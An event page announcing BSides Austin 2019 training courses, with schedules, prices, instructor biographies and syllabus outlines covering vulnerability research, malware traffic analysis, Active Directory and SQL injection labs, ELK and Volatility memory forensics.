BSides Austin 2019 Training Days
In celebration of our event’s 10th anniversary, we are working to make it extra special for our attendees. The most significant way we could think of to make our security community even happier and smarter by the end of our event was to add more in-depth opportunities for learning. To a security community known for its hunger for more, we introduce the BSides Austin 2019 Training Days—two days of low-cost training classes that provide deeper learning on technical and management subjects.
Because this is our first attempt at offering courses, we will be monitoring the security community’s response to the idea. If all goes well we will consider offering this again, so please let us know you like this concept by signing up for a class and/or telling your friends and colleagues!
Our courses will run on Tuesday and Wednesday, March 26-27, right before the BSides Austin conference on March 28-29. (Tickets to the conference are sold separately.) Food and beverages are not provided, but the facility has a cafeteria.
Tuesday, March 26 | Commons Learning Center on the J.J. Pickle Research Campus on Burnet Road
- Bug Hunting: Day one of two-day course taught by Zef Cekaj and Jason Randall
- 9:00 am – 5:00 pm (REGISTER for $200) (read the requirements carefully)
- Malware Traffic Analysis Workshop: One-day course taught by Brad Duncan
- 9:00 am – 5:00 pm (REGISTER for $100)
- Effective Security Leader Training: A Business-Driven Approach with Practical Management Techniques: Half-day course taught by Philip J. Byer
- 8:30 am – 12:30 pm (REGISTER for $50)
- Parsing Logs via ELK: Half-day course taught by Mark McLauchlin
- 1:00 – 5:00 pm (REGISTER for $50)
Wednesday, March 27 | Commons Learning Center on the J.J. Pickle Research Campus on Burnet Road
- Bug Hunting: Day two of two-day course taught by Zef Cekaj and Jason Randall
- 9:00 am – 5:00 pm (Register link is above) (read the requirements carefully)
- MWR Playground Labs: One-day course taught by Cale Black
- 9:00 am – 5:00 pm (REGISTER for $100)
- Incident Response with Volatility Framework: One-day course taught by Evan Wagner
- 9:00 am – 5:00 pm (REGISTER for $100)
This two-day course covers a real audit and discovery of vulnerabilities in enterprise software. If you’ve ever wanted to learn how CVEs are made or would just like to participate in a guided group audit of an enterprise application, this is your class. We will cover basic reverse engineering and debugging, some scripting, a few pro tips, and next steps.
Laptop, IDA Pro (Note: the freeware version does not support the idapython plugin. This is not a huge component of the course and scripts/results will be reviewed). Prospective students should have basic x86 assembly fluency. Previous debugging experience is also required. Our debugger of choice for this class will be WinDBG. Programming experience is required, preferably in Python as the class will be developing IDAPython scripts to aid in reverse engineering.
Jason Randall is a senior vulnerability researcher at Raytheon CSI where he specializes on macOS and iOS platforms with most recent focus on the XNU kernel. Jason has worked in various targets from embedded devices to “other” things that may fly, float, or drive. He enjoys developing tools that aid in vulnerability research and exploitation like heap visualizers or IPC man-in-the-middle tools. Jason also likes video games; you may find him dumping hours into WoW or Overwatch.
Zef Cekaj is a senior vulnerability researcher at Raytheon CSI specializing in binary reversing and vulnerability discovery. He has reversed and documented hundreds of vulnerabilities in various target software. He has developed exploit chains for many of them. His primary interests are in the exploitation of server side vulnerabilities and mitigation circumvention.
Malware Traffic Analysis Workshop
This one-day workshop provides a foundation for investigating pcaps of malicious network traffic. We begin with basic investigation concepts, setting up Wireshark, and identifying hosts or users in network traffic. Participants then learn characteristics of malware infections and other suspicious network traffic. The workshop covers techniques for determining the root cause of an infection and false-positive alerts. We conclude with an evaluation designed to give participants experience in writing an incident report.
Technical person at a beginner to intermediate level (good for new security analysts)
Laptop computers running non-Windows environment (using a VM will work for this) and having a recent version of Wireshark installed (version 2.2 or later)
After 21 years of classified intelligence work for the US Air Force, Brad transitioned to cyber security in 2010, and he is a currently a Threat Intelligence Analyst for Palo Alto Networks Unit 42. Brad specializes in network traffic analysis. He is also a handler for the Internet Storm Center (ISC) and has posted more than 140 diaries at isc.sans.edu. Brad routinely blogs technical details and analysis of infection traffic at www.malware-traffic-analysis.net, where he provides traffic analysis exercises and over 1,600 malware and pcap samples to a growing community of information security professionals.
Effective Security Leader Training: A Business-Driven Approach with Practical Management Techniques
Being an effective security leader is a challenging prospect. As demand for security professionals increases, technical contributors ﬁnd themselves thrust into management and leadership positions. Often these contributors feel poorly equipped for their new roles. Unfortunately, they grapple for answers, resources, and support in a haphazard way, lacking clarity or effective practices.
This training outlines a method of practice which produces professional value over time. It addresses the differences between technical contribution and management, and between management and leadership. The intended audience are those hungry for guidance, those starting to figure things out the hard way, and those who simply want to deliver outstanding value to their employers and the security profession.
The topics include concrete recommendations about how to communicate with peers, increase inﬂuence with executives, build relationships with one’s team, introduce risk to the decision-making process, and streamline business innovation. If you’re ready to meet others who are wrestling with similar issues and are driven to perform as a leader, let’s get started.
- Identify the skills necessary to transition to management.
- Determine a path for professional growth.
- Identify the skills necessary to improve management results.
- Identify the skills necessary to retain talented employees.
- Determine an ongoing method of practice for skill development.
- Identify the skills to seek in a security leader.
- Determine how to cultivate effective security practices.
Philip J Byer
Philip Beyer is the Vice President of Security Engineering for TSYS. He leads the teams building solutions to protect customer and card-holder data.
Mr. Beyer is mission-driven to guide security leaders to higher effectiveness. His company Getting Security Done supports professionals with business communication and value creation training. He co-founded the Texas CISO Council, a regional committee that develops free strategic resources for security leaders.
As the Senior Director of Information Security for The Advisory Board Company, Mr. Beyer led the prevention, detection, and response programs for a ﬁrm improving the performance of 5,500+ health care organizations and educational institutions around the world. As the Information Security Ofﬁcer for the Texas Education Agency, he protected data for 1200 school districts, 5 million active students, and 1 million employees. As a Lead Consultant for Denim Group, he led security assessments, improved risk management practices, developed detection and response capabilities, and strengthened information security programs for a variety of businesses and Fortune 100 clients.
During Mr. Beyer’s presidency, the ISSA Capitol of Texas Chapter (Austin ISSA) was recognized as Chapter of the Year in 2013. He holds a BS degree in Physics from Trinity University and the CISSP certiﬁcation. Outside the ofﬁce he is a martial artist and ultra-marathon runner.
Parsing Logs via ELK
ELK is an powerful open source search application. Often overlooked is the parsing functionality it can provide to enrich security event log data. This hands-on training will go over the ELK stack including installation and configuration of Filebeat, Logstash, Elasticsearch, and Kibana along with some best practices. A good portion of the time will be parsing log events with Logstash. Logstash is referred to as the Swiss army knife for log parsing and deservedly so. It has some very powerful capabilities when it comes to slicing and dicing events so they are more useful when it comes to searching for the needle in the stack of needles. Additionally, Logstash supports 50+ outputs. Even though Logstash is typically associated with Elasticsearch, it can send parsed event data to many other technologies such as DataDog, Graylog, Kafka, S3, etc. No prior knowledge of ELK is expected or required.
Anyone interested in logging
Laptop with a Linux OS or VM
I am on a team that manages a large ELK stack at a Fortune 10 company. I have developed training guides and videos for end users and assist in on-boarding logs and troubleshooting any issues teams may encounter.
MWR Playground Labs
MWR will be giving participants access to their cloud-based training labs: The Playground. These challenges will help equip security professionals (both defensive and offensive) with the expertise to defend their network and applications by better understanding how they are attacked and exploited.
The two Playground challenges are listed below.
Active Directory Hacking:
This lab will walk you through a full compromise of an Active Directory environment. This will involve utilizing the following skills:
- Delivery and execution of payloads via phishing emails, using metasploit, Powershell Empire and Cobalt Strike
- Persistence, privilege escalation and pivoting within the environment
- Enumeration of Active Directory environments (PowerView, Bloodhound, ADOffline)
- Exploitation of Group Policy Preferences (GPP)
- SPN and Kerberoasting
- Mimikatz / incognito
- Windows password cracking
Web App SQL Injection:
This lab will teach you some of the basics of web app exploitation. Most notably you will:
- Identify a SQL injection vulnerability
- Exploit the vulnerability to exfiltrate customer data
- Exploit a vulnerability to exfiltrate files from disk
- Upload a webshell to the server to gain RCE (Remote Code Execution)
These labs are great for those on the defensive side of security who are looking to better understand how hackers can compromise their networks and applications. Similarly, they are great for those on the offensive side of security who are less familiar with these techniques.
Laptop with Kali linux installed
Cale is a general computer security enthusiast and internet denizen who has spent the last few years working on the blue team as a UNIX systems administrator and on the red team as a penetration tester. He works with MWR InfoSecurity as a consultant and general trouble maker. If it moves bits and bytes, he wants to tear it apart and put it back together.
Incident Response with Volatility Framework
- What is Volatility Framework
- Supported Formats
- Profiles / Debug Symbols / PDBs
- Operating Systems and Builds
- Plugins Concepts
- Github Repository
- Distro Packages
- Rekall Fork
- Why use Volatility
- Considerations and experiences from in the field
- How to
- Capture Memory
- Physical Memory
- Hibernation Files
- Page/Swap Space
- Virtual Machine Snapshots and VMEM
- Converting VMWare Suspend Snapshot into memory dump
- Space considerations
- Using [lin|osx|win]pmem tool
- Working with Image Formats
- What is compatible and what is not
- AFF4 format
- Extracting AFF4 streams into RAW memory files
- Extracting Volatility Framework
- Basic usage information
- Determine OS Build Profile
- Comparing process discovery plugins and results
- Identifying parent processes in execution tree
- Listing process threads
- Process ownership SIDs
- Extracting processes out of dump
- Performing static analysis on extracted processes
- Network Connections and Sockets
- Connection scanning plugins
- Identifying suspect process based on indicator(s)
- Object and Files
- Concept of Handles
- DLLs▪ Loaded/Unloaded Modules
- Scanning for files
- Searching by filename/type
- Extracting files from the image
- Exposing Secrets and Keys
- Finding Certificates
- Dumping NTLM/LM Hashes
- Dumping cached Domain hashes
- Dump decrypted LSA passwords
- Operational Items
- Display Clipboard
- Environment Variables
- Finding Services
- Output Format options
- Creating Searchable Timeline
- Capture Memory
- What is Yara
- How to use Yara
- Finding Malware
- Memory protection violations
- Command line console history
- Finding hooks
- Using Yara to find processes associated to indicators
- Extending functionality
- Adding Plugins
- Real World Exercises
- Will be given scenarios and VMs/Memory dumps to identify what happened
- Finish up the class with extra challenges and prizes
These labs are great for those on the defensive side who are looking to better understand how hackers can compromise their networks and applications. Similarly they are great for those on the offensive side of security who are not as familiar with these techniques. A basic to intermediate understanding of web applications and active directory will be helpful.
- Laptop with enough free space to work with 8GB+ memory dumps
- Virtualization hypervisor to run Kali or Remnux
You will be provided a USB drive with:
- Slides from the presentation
- Example memory dumps
- Scripts to convert memory images
- Example automation scripts
Evan is a Sr. Incident Response Specialist with Walmart.